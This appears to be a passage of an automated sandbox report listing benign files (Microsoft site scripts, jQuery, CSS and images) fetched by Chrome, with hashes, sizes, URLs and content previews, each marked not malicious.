                                                                                                                                                                                                                                                          MD5:8F1B786599DDD1D6C94A1D907F2CB5FD
                                                                                                                                                                                                                                                          SHA1:4E5B3082D74407777629A4EE2B5DCA1768FF0C5D
                                                                                                                                                                                                                                                          SHA-256:20BF0322758485EE42D1480678AA5799087DAD8D0615AFCEF1448D0B34878AE3
                                                                                                                                                                                                                                                          SHA-512:FF10A31D0A94A78BB05AF0738A28ED65580F0DF5FA13CE3E69609407EB9D174B351B2139228A926FB3747245190213E28DEEB3F4CD7CBACA281CFE3E9923B87E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/components/content/reimagine/atomic/footnote/v2/footnote/clientlibs/site.min.ACSHASH8f1b786599ddd1d6c94a1d907f2cb5fd.js
                                                                                                                                                                                                                                                          Preview:/*******************************************************************************. * Copyright 2018 Adobe. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. ******************************************************************************/.(function() {. "use strict";.. let count = 0;. const prefix = "__footnote";.. /**. * Jumps to elements location without being hidden by the page navigation menu (if any). * @param {Event} event . * @param {JQuery Object} jumpToEleme
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9316
                                                                                                                                                                                                                                                          Entropy (8bit):4.267140948442776
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:7GrOUjDYq5FEF/zj2wrEEegbSYCkK2MlXW2UqEcK9MwC1uAyI9J3Yullgubephg2:qrzjDYq5FEFLjRJpKJxWrqhKGXy83Y3N
                                                                                                                                                                                                                                                          MD5:2B143BED0FF34BC70BC0703346F70E08
                                                                                                                                                                                                                                                          SHA1:7FB14A8842293FD041C7C138285AC2F822AC4B4C
                                                                                                                                                                                                                                                          SHA-256:C35BBDEE4A46BFBF552989E1126E1F09B454EB3DC2523376C38964BF6128BE86
                                                                                                                                                                                                                                                          SHA-512:46BBF881243EC3C27046FCB66F9D8412B459CC7B6DA1ABF0DCB5F70D578F57E9A88D52431753B65F851892055AC17EDD9446E11BA67D7B0DA80B2B2615F67688
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:// This function replaces popover data-island tags insertd in RTE via the popover plugin.(function () {. if (!window || !window.ocrReimagine) {. return;. }.. window.ocrReimagine.PopoverRichTextPlugin = new class {. popoverRichTextMountSelector = '.popover-rte-mount';. popoverMountSelector = '[data-mount="popover"]';.. isPopoverComponentEnabled() {. return !!(window.mwf?.Popover);. }.. isIconComponentEnabled() {. return !!(window.ocrReimagine?.Icon?.getInstances());. }.. /**. * Initialize popover elements with the class 'popover-rte-mount' by looking up inside the target element or entire document.. */. initializePopoverRichTextPlugin() {. if (!this.isPopoverComponentEnabled()) {. return;. }.. // Get all popover rich text elements.. const popoverRichTextElements = this.getPopoverRichTextElements();.. if (!popo
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (605)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):179808
                                                                                                                                                                                                                                                          Entropy (8bit):5.556656445593751
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:xLp14+FgmOlITmhHDBrWnW+9BDI8nvtmmRHVi3J11HFaANDVDoO:xLp3EHDBrWW2BjvRREJPHFXNh
                                                                                                                                                                                                                                                          MD5:C3AEC3D03BC5447975E3EE25B53F6C32
                                                                                                                                                                                                                                                          SHA1:353F68C0F6DF93888427E40135CF2DBF517F6FD0
                                                                                                                                                                                                                                                          SHA-256:72FBAC0EA8A0FF74E7ABE2E24FB992885AC904A3C1C579387E97654DD9C535BA
                                                                                                                                                                                                                                                          SHA-512:7D0E3CE67B84B7C1BBFC4511623426D68DE11D90BBEFF026013424C17D810CB59C75CD0754DD3A8AD9D3E27ED9620C9A6B92E2D7188C03845B0C3CC0E72951A1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:'use strict';(()=>{function kc(a){a=!1===(a=void 0===a?!0:a)?null:gg;return a||((a=(a=(a="undefined"!==typeof globalThis?globalThis:a)||"undefined"===typeof self?a:self)||"undefined"===typeof window?a:window)||"undefined"===typeof Sc.g||(a=Sc.g),gg=a),a}function se(a){function b(){}var c;if(hg)a=hg(a);else if(null==a)a={};else{if("object"!==(c=typeof a)&&c!==yc)throw new TypeError("Object prototype may only be an Object:"+a);a=(b.prototype=a,new b)}return a}function Sa(a,b){function c(){this.constructor=.a}if(typeof b!==yc&&null!==b)throw new TypeError("Class extends value "+String(b)+" is not a constructor or null");ig(a,b);a.prototype=null===b?se(b):(c.prototype=b.prototype,new c)}function jg(a,b){for(var c=0,d=b.length,e=a.length;c<d;c++,e++)a[e]=b[c];return a}function Gb(a,b){return a&&ud.prototype.hasOwnProperty.call(a,b)}function vd(a){return a&&(a===ud.prototype||a===Array.prototype)}function te(a){return vd(a)||a===Function.prototype}function lc(a){if(a){if(Tc)return Tc(a);var
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):4488
                                                                                                                                                                                                                                                          Entropy (8bit):7.89532602480277
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:+cLjBMCQfeYCk5J45Xfu8Su1gRS+whcmSFk7uhQefhkcoh:+W13QfeWLqvugGR9w9L7ZEhs
                                                                                                                                                                                                                                                          MD5:BC2514550A7FF0F5A460B7B26947D3F6
                                                                                                                                                                                                                                                          SHA1:40BF03FA8485475A25AD59B01C7C29E2BDB95F51
                                                                                                                                                                                                                                                          SHA-256:89609F82D6181F230251FF98335CFBF87A3EA265F94563783C67B958A9713999
                                                                                                                                                                                                                                                          SHA-512:C98885230DAACC8CCF00239C3BEE66541331D78C3D39869616E2345BC705B419E96090C4623887219685D90B5730B3E3822717648EB23AAF1D80649A8C966FA0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Social_Media_Logo_X?scl=1
                                                                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................n...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................vmdat........h...B2. ....T#......Idp.<.6.-..,.......A.T...<..t...G.s.A.....\...\.;...?..q.....ei .....6.K..f+..;.\..........$C..kl.T|.3/..9.9...$..=.~.-R%...d.;......,....h...7.....X2..(..2..0...D1$.G.(.....L....:[...B.U.HM.7.[4"..jA.@...^.N.O>.a..J.r.Z..^d...;sx.....GR<.Y/..F2..1_..lFRS.T...^0O.."...x..$.N..}.Z..)...n't*7..p..K.g.p....p.W_..$F^-.<...hiD.`...$#S.k..J .!.+.f..0...).......\...........K..K.W\U..E.E.".A.P......b.P......{.......[..L..~.......5..`......Z..]...4..*.<...T&.......eV..~>"l...~.W.].b.stw...}....1Mi2WbG.M.v...t...P..C&&...&z./..O.......}w..0.m..G....F$.0.....Y.=N...Yi..j8^Z.s....c....W....{....`K4.)...M........d.T.3>+....ys >.p..0.-.._.].2/..k.I.0. .>9hV...
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (605)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):179808
                                                                                                                                                                                                                                                          Entropy (8bit):5.556656445593751
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:xLp14+FgmOlITmhHDBrWnW+9BDI8nvtmmRHVi3J11HFaANDVDoO:xLp3EHDBrWW2BjvRREJPHFXNh
                                                                                                                                                                                                                                                          MD5:C3AEC3D03BC5447975E3EE25B53F6C32
                                                                                                                                                                                                                                                          SHA1:353F68C0F6DF93888427E40135CF2DBF517F6FD0
                                                                                                                                                                                                                                                          SHA-256:72FBAC0EA8A0FF74E7ABE2E24FB992885AC904A3C1C579387E97654DD9C535BA
                                                                                                                                                                                                                                                          SHA-512:7D0E3CE67B84B7C1BBFC4511623426D68DE11D90BBEFF026013424C17D810CB59C75CD0754DD3A8AD9D3E27ED9620C9A6B92E2D7188C03845B0C3CC0E72951A1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/structure/page/clientlibs/custom-oneds.min.ACSHASHc3aec3d03bc5447975e3ee25b53f6c32.js
                                                                                                                                                                                                                                                          Preview:'use strict';(()=>{function kc(a){a=!1===(a=void 0===a?!0:a)?null:gg;return a||((a=(a=(a="undefined"!==typeof globalThis?globalThis:a)||"undefined"===typeof self?a:self)||"undefined"===typeof window?a:window)||"undefined"===typeof Sc.g||(a=Sc.g),gg=a),a}function se(a){function b(){}var c;if(hg)a=hg(a);else if(null==a)a={};else{if("object"!==(c=typeof a)&&c!==yc)throw new TypeError("Object prototype may only be an Object:"+a);a=(b.prototype=a,new b)}return a}function Sa(a,b){function c(){this.constructor=.a}if(typeof b!==yc&&null!==b)throw new TypeError("Class extends value "+String(b)+" is not a constructor or null");ig(a,b);a.prototype=null===b?se(b):(c.prototype=b.prototype,new c)}function jg(a,b){for(var c=0,d=b.length,e=a.length;c<d;c++,e++)a[e]=b[c];return a}function Gb(a,b){return a&&ud.prototype.hasOwnProperty.call(a,b)}function vd(a){return a&&(a===ud.prototype||a===Array.prototype)}function te(a){return vd(a)||a===Function.prototype}function lc(a){if(a){if(Tc)return Tc(a);var
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 150x150, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):4288
                                                                                                                                                                                                                                                          Entropy (8bit):7.956294742640289
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:N3IzkJ3iN4bIbGV2RZmDEgXOxINRIb/qTFTGblkH:N4zkJ33IbNm9XVOqTFQlu
                                                                                                                                                                                                                                                          MD5:01D1E1E0EE687E121C32709295270EC2
                                                                                                                                                                                                                                                          SHA1:AEEF213A9F99221435BE03FDED5BBD510AC0B051
                                                                                                                                                                                                                                                          SHA-256:2A5F56CE4EEC14EB9211ABCF120C59D1D3C25E2834139A7198DB57A189A431FE
                                                                                                                                                                                                                                                          SHA-512:0D2ED814DCDA0C6EA7F87A11CF17F2F6DFB0BBE07448356F19A28D88B39FACAA59A5ECF7649C845A968BA31E49F784B33EAF9A9B6978A561D955EC4AF6B7F10D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/oc_chat_face_global
                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 .....G...*....>Q .D#.!..m.8....f...*P........0.m.%.......N...|.[...7;=....h...:...X....}u.+...'.5=.`.cp.T...h.....5.nj@.{B.Fo2....._nY.4..kY..|..y9.o.8....'...4^.O.....w.X.o........x#M...;..Vv...R..$...r.)....r.7l?.V.bo.9..Z.g..X........1.'...j.e].........&.|..A..y.5H..1.....e(;5.e..U...Y#.......QC.c.....o..F.zo..A...GE.!qB)...l..[.Ux9........sEe..../....f_.A...B..>.i..........\.)l.cN.}.N..*..<<r...h....Y.... e....=..c..D y.VG..........f.9.B_..R}..a..&.....Dg.....@..K...&....{..:..C+.....O.NV.2..|..tchX.$.. ....Ks...+...s.R.dU.e.-T.oL3.....x..<..{j...Zn.G.&.TI`....!.wD.N.v\.B._C.:.....X.4....x......s....m..!...qn.. .....Rf...+.z...v..P..,....UU,%...t}....$X.*.;....}D.N...h..._...Fz..o......d..|-....=..`"..........lx....0.n..|Y...x.....t..:...&..).i.=.L......P$..p~......Z.......F.."..\C..T...0.a;$..)...T...[.W/.N..S........~.=....i..d1.X.x..s<..+Xj../7("^..Y.l.W;..y[0.....}.j..x..4z.7.]..$I...#.wt.`j.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 128x128, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):588
                                                                                                                                                                                                                                                          Entropy (8bit):7.461606938925066
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:c15bT7pAGlBuLnI3roY5sa6McYvz37XTr+7T35gym9ldcR:KFT7pAGltMYCaPcYv7r+7TjKkR
                                                                                                                                                                                                                                                          MD5:3B10BCAEF3FA01308272D66E6D617E16
                                                                                                                                                                                                                                                          SHA1:27179581148123A0F88F4915C479F9B7F5D7CEB6
                                                                                                                                                                                                                                                          SHA-256:A2FA3653A82FC4272100532B418574506850BB3798917FFC5C6399E5C4028A88
                                                                                                                                                                                                                                                          SHA-512:C08422FD00CDBE4FFED20FFCB3486DC1673EAA0C5B06291FBD15BE3D85CFE32A2FD7ED457BC6B0E16C48BC368013A9B5F23B10E16458A307050AAC7C98F32458
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:RIFFD...WEBPVP8 8........*.......%.......>...~.~...............?...3..s.....{...K.......?dO.?.|...{....-.k.....~P...p.._:.|..^[._"?..2...........g.\.....hyxf..............-..{..?.y..Z.....D..4dm.1.......:.gCq.}.+....~@.'...J..ldeoy%....V..._...,..?.)..xo..V.......S.?>.{F...:M..a4..)K.~..-K$...wx..BSU.)....ogj.>..L..Ex..$ ...\..0OXum.U..bU)D.7J:....r..].fX#.d.U.......M. ........].".6.}.k,7..0.CD?.. .D....|q..mQ.Y..P..f`.%'.j....>Ns..i.D.T.]. ...<...,......z.....Z....n.cs.-.$n...Z.1..[.v.. ...T..._...seOF4...../.....9L,.W?.fo..3.E......X.....:._....P.`.....
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):203
                                                                                                                                                                                                                                                          Entropy (8bit):4.6712092041548265
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:lTjYues7JVLt0dalnfJTTjYsQb7JVLt0dw:y5s7JVLTpfJU97JVLj
                                                                                                                                                                                                                                                          MD5:44700D76F3F63FA33F30039BB9C74B39
                                                                                                                                                                                                                                                          SHA1:F68B158102C2575081CB4308E4FEA483E1B9D604
                                                                                                                                                                                                                                                          SHA-256:FD73C7131FEA30896A95BC1D0E9F08F383FEFB03730DB9A433F43B319EFF33AC
                                                                                                                                                                                                                                                          SHA-512:2665D21274DB60A9BC6BCC7100DF57C2EE0E2264601A295902CC0E958CBA2B198E4C1AB6291947A8F33DC46D42AE0E1F586369CB3F3B011C751C81EFA755C234
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-action.min.ACSHASH44700d76f3f63fa33f30039bb9c74b39.css
                                                                                                                                                                                                                                                          Preview:body div[data-geo-country="US"] .us-hidden:not([data-isenvauthor="true"]){display:none}.body div[data-geo-country]:not([data-geo-country="US"]) .non-us-hidden:not([data-isenvauthor="true"]){display:none}
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):56975
                                                                                                                                                                                                                                                          Entropy (8bit):4.7745064069477285
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:md21iWKHFZV8rQ9KiY2pYJp10npm7Kc1DP:md21QHHAP
                                                                                                                                                                                                                                                          MD5:884BD098ECB71645787C430F99C6D7B6
                                                                                                                                                                                                                                                          SHA1:1F8B450E1D71D2F2242D6959A8C0EC50974EE448
                                                                                                                                                                                                                                                          SHA-256:B4530D1B6EE9EAF575D6758D140613A368341C087BF22EF3E9475C477E798733
                                                                                                                                                                                                                                                          SHA-512:CF8DDA718482CF562877EEEB67D1EEB02C06D0B70F2FEA31177B6E9CA6EE1A628693B7249CA361E72955B4811405EDB9B3B651DC323018BFF2C1CCA1F3305C54
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-product-pricing.min.ACSHASH884bd098ecb71645787c430f99c6d7b6.js
                                                                                                                                                                                                                                                          Preview:(function () {. /** Check if OneCloud Reimagine namespace exists */. if (!window.ocReimagine) {. window.ocReimagine = {};. }.. /** Create product price module namespace */. if (!window.ocReimagine.ProductPriceModule) {. window.ocReimagine.ProductPriceModule = {};. }.. /** Initializes the reimagine product pricing manager and services */. function initializeProductPriceModule() {. try {. // Check if product pricing manager instance exists. if (window.ocReimagine && window.ocReimagine.ProductPriceModule && window.ocReimagine.ProductPriceModule.PricingManagerInstance) {. // If it exists, that means it has already been initialized so no need to re-initialize. return;. }.. window.ocReimagine.ProductPriceModule.PricingManagerInstance = new window.ocReimagine.ProductPriceModule.ProductPricingManager();. }. catch (error) {. }. }.. /**. * By defau
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (42133)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):138268
                                                                                                                                                                                                                                                          Entropy (8bit):5.224497765711851
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:1f4HuF7pxnISnJ9d1EwgXA7CisuMK/xw/:1f4Hu1I+Tw/
                                                                                                                                                                                                                                                          MD5:5B85413B96AF340238B93068CDB641FB
                                                                                                                                                                                                                                                          SHA1:D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
                                                                                                                                                                                                                                                          SHA-256:1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
                                                                                                                                                                                                                                                          SHA-512:5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/onerfstatics/marketingsites-eas-prod/shell/_scrf/js/themes=default/54-af9f9f/d4-fb1f57/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/f9-a5b2ce/db-bc0148/dc-7e9864/6d-c07ea1/6f-dafe8c/f6-aa5278/73-a24d00/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/d0-e64f3e/92-10345d/79-499886/7e-cda2d3/58-ab4971/74-d51c79/e0-3c9860/de-884374/1f-100dea/33-abe4df/2b-8e0ae6?ver=2.0&_cf=02242021_3231&iife=1
                                                                                                                                                                                                                                                          Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):697
                                                                                                                                                                                                                                                          Entropy (8bit):4.9687589816244095
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:UHevFvKrbON5NtK/efIBbd/FqYT/ZTkAxtK/efb+RAd/FjDhQAThtK/efKXEnHz7:KWFNvs/ew//Fqu/ljxs/eD+R0/FjtQ+V
                                                                                                                                                                                                                                                          MD5:D2F3218A374A1305FE262FC4BAEEDDD1
                                                                                                                                                                                                                                                          SHA1:103721E516DC86A8EC433C6EA7C227BF7D954A55
                                                                                                                                                                                                                                                          SHA-256:F76208F59F7E18EFB405361893B45B9DD7D0759BB5329AC664F39C02384982CD
                                                                                                                                                                                                                                                          SHA-512:011062B7E77B5BBCACC6391C6E9873D4221E3474276F56D36EF29B78EA9E7C1C6C2021DA3D80D79C30E1675AC0CE62DC397C52051C7C1478054C02AF27BC7077
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-vars/publisher.min.ACSHASHd2f3218a374a1305fe262fc4baeeddd1.js
                                                                                                                                                                                                                                                          Preview:/**. * OneCloud environment constants class.. */.class OneCloudEnvironmentConstants {.. /**. * OneCloud data connector AEM publisher variables.. * @readonly. */. static DataConnector = Object.freeze({. "endpoint": "/msonecloudapi",. queryParams: {}. });.. /**. * Microsoft API Prod Endpoint. * @readonly. */. static MicrosoftAPI = Object.freeze({. "endpoint": "https://www.microsoft.com/msstoreapiprod". });.. /**. * Appsource Request Header. * @readonly. */. static AppsourceAPI = Object.freeze({. "header": "Njg1YmM2MWI1ZTA4MWVlMzAxZTQwM2YxMzk2MjU4YzljMDE3Nzc0NDM2MWMyMzg3MGQwZjMwYzIxZWY0ODMwMQ==". });.}
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (889)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):92962
                                                                                                                                                                                                                                                          Entropy (8bit):5.482012211093105
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:wB4vGoYlmQr+IDv1Ty/6RsSz5TGF/46nNUgDbC03vu9FnHKDfa6Z/VUhdIKq6Tjv:wqxNrNG9FnHKD/oIKq6Tjv
                                                                                                                                                                                                                                                          MD5:35986A813756F39AB6B922979FFEDB03
                                                                                                                                                                                                                                                          SHA1:C8E2213BBAFAF535DA9C6676F3DBA43449E4D15A
                                                                                                                                                                                                                                                          SHA-256:E2D92BDAAD925C6D355331A338384EE3FF82492352975DD4EFDA791AEF4AB3F5
                                                                                                                                                                                                                                                          SHA-512:289F1C432E73F611D54EB1130013174174222A0C5EEF8E2464C5FD51EE33DC702326EEECA80B2AAE213DB2FCCB149297FC37CC9A0B6CF6E928A66BC27843F930
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-jquery.min.ACSHASH35986a813756f39ab6b922979ffedb03.js
                                                                                                                                                                                                                                                          Preview:/*. jQuery JavaScript Library v3.5.1. https://jquery.com/.. Includes Sizzle.js. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://jquery.org/license.. Date: 2020-05-04T22:49Z. Sizzle CSS Selector Engine v2.3.5. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://js.foundation/.. Date: 2020-03-14.*/.'use strict';(function(H,Sa){"object"===typeof module&&"object"===typeof module.exports?module.exports=H.document?Sa(H,!0):function(Ta){if(!Ta.document)throw Error("jQuery requires a window with a document");return Sa(Ta)}:Sa(H)})("undefined"!==typeof window?window:this,function(H,Sa){function Ta(a,b,c){c=c||M;var d,f=c.createElement("script");f.text=a;if(b)for(d in Kc)(a=b[d]||b.getAttribute&&b.getAttribute(d))&&f.setAttribute(d,a);c.head.appendChild(f).parentNode.removeChild(f)}function Ia(a){return null==.a?a+"":"object"===typeof a||"function"===typeof a?db[Ob.call(a)]
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 128x128, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3708
                                                                                                                                                                                                                                                          Entropy (8bit):7.948093833909796
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:vXQ30YDi5zzaEXdvUXvF80pYLXV/Jzopep4BNphFpX:o3k5nZyd+B4ep4V
                                                                                                                                                                                                                                                          MD5:F1268BE988FAC234083E80A1FEA12D93
                                                                                                                                                                                                                                                          SHA1:9F7C9AE8F5C3541648A5D83F55776131D7D09A66
                                                                                                                                                                                                                                                          SHA-256:2DE2618A29D67A1FFBAFB2FB72FD6DA36F2ED860895D94B9C6E1F9EDE09863A6
                                                                                                                                                                                                                                                          SHA-512:71DEB6149A4B571DA55F6EC74775EF8B01E9497E71DA7AC5A14A27A669543DB3EDB8ACE388CF3FC59B13DDA8EDB3C93B856B7715D840A70ABD85FD3CF74B04D5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:RIFFt...WEBPVP8 h....1...*.......%..W......F.C.W...7....m.... H.|.._.?..o?.k.~....?...?...y.........w.......o..`.....H.^.....'.7.5.?../..._..._..G...D.............$.F.....O.W..................%........X.f.1...mnF......>..-u5..{..a6.....?]Q-.....b...lMVp>..9}..P`v.9.:#.lS.........x..R.....tE...e........mr.@1DW...*....C.LX..b.8<(../..v/..Xif....TP.t.u... $...[.....9...Qp..QV.y|J........y..}...../......+..............@LT.....=.,[6.......4...7..w}Os.%.$...#.i......./S*.x..q;..}B...T.....hS]}-.....(i.....h./K.......$...$u....nbZ.P.....y....M.;Yb....D8d.p..r.@......F..@k""&C...:R...R8L..,..F.r.4..)....=IP.F....@..|.8.Z$.IN.9.."O.z><..vD...UX~R.g.@...........8r.o..E.R.d....x...:!.:...#EK....2b.5.B...&.).dXZi`..l....l%..:....E.9aU.......l.X.(.H]F.....d.t<...N.....!...7]R):...7........=...g.c.4.......w....-R.6..Wf.9....o.z.x..F..|.8.@ ..s|.z ............?.u.8.. !.b..e..I...c...kp.L..+.,....X.4...'..X.)......P.........UU+....#...L.....P..*.d..^......
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (309), with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):309
                                                                                                                                                                                                                                                          Entropy (8bit):4.971196656935236
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:QuVtCiR2cIT53AM+64uT7nadCkq9KwhA6ONHSInadLb1wnzjCY1ee:jVtCyB4w1cWdYpAfVSVdLa8e
                                                                                                                                                                                                                                                          MD5:D7106DB242C2B41F88A1B02418BEC7E2
                                                                                                                                                                                                                                                          SHA1:7A445118F0B5712744AA4AED6889B28C1E7779F7
                                                                                                                                                                                                                                                          SHA-256:044527A735B287BD84D2AE6D2D3B89C85B52C9750BB07E5AEF19FB8F28F0442B
